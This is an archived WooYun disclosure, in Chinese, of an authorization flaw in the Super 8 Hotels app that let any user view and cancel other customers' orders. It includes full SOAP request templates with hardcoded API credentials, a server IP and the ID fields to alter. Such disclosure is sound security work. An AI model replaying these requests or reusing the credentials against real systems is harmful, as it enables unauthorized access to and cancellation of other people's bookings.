当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102623

漏洞标题:速8酒店某APP越权可查询并取消他人订单

相关厂商:速8酒店

漏洞作者: 深度安全实验室

提交时间:2015-03-23 09:51

修复时间:2015-05-10 22:14

公开时间:2015-05-10 22:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-04-05: 细节向核心白帽子及相关领域专家公开
2015-04-15: 细节向普通白帽子公开
2015-04-25: 细节向实习白帽子公开
2015-05-10: 细节向公众公开

简要描述:

本来只是查看别人的订单,后来发现还能取消~

详细说明:

1.速8酒店APP下载地址:
http://www.super8.com.cn/
版本:v1.9.8

漏洞证明:

1.登陆后查询已有订单

POST /mobileInterface/Interface.asmx HTTP/1.1
POST: /mobileInterface/Interface.asmx HTTP/1.1
Content-Type: text/xml;charset=UTF-8
HOST: 124.127.125.70
SOAPAction: http://tempuri.org/NewGetMemberOrderList
User-Agent: Jakarta Commons-HttpClient/3.1
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 541
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/"><soap:Header><tem:AuthenticationToken><tem:Username>crs.iphone</tem:Username><tem:Password>crs.iphone.admin</tem:Password><tem:Ticks>1426839173570</tem:Ticks><tem:cKey>e338edd02e43a2f1c1188807dc48c7eb</tem:cKey></tem:AuthenticationToken></soap:Header><soap:Body><tem:NewGetMemberOrderList><tem:start>2015-03-10</tem:start><tem:end>2015-03-21</tem:end><tem:cardNo>306211822</tem:cardNo></tem:NewGetMemberOrderList></soap:Body></soap:Envelope>


306211822为用户id,修改id后可以查看其他人订单

qitading.jpg


2.然后进行订单取消操作,为了验证又申请了个注册号
发送取消请求并拦截

POST /mobileInterface/Interface.asmx HTTP/1.1
POST: /mobileInterface/Interface.asmx HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: http://tempuri.org/CancelOrder
User-Agent: Jakarta Commons-HttpClient/3.1
HOST: 124.127.125.70
Connection: Keep-Alive
Content-Length: 516
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header>
      <tem:AuthenticationToken>
         <tem:Username>crs.iphone</tem:Username>
         <tem:Password>crs.iphone.admin</tem:Password>
      </tem:AuthenticationToken>
   </soapenv:Header>
   <soapenv:Body>
      <tem:CancelOrder>
         <tem:accId>31499316</tem:accId>
         <tem:remark>Cancel By Client</tem:remark>
      </tem:CancelOrder>
   </soapenv:Body>
</soapenv:Envelope>


<tem:accId>31499316</tem:accId>是订单号,
通过刚才的查看其他用户的订单信息可以获取到相应订单号accid,在取消请求中修改订单号,就可以取消他人的订单了,系统会返回信息:操作成功,手机也会收到取消短信

quxiaodingdan.jpg


取消的都是自己注册的测试号码,不会影响正常业务

修复方案:

鉴权吧

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-26 22:13

厂商回复:

谢谢提醒

最新状态:

暂无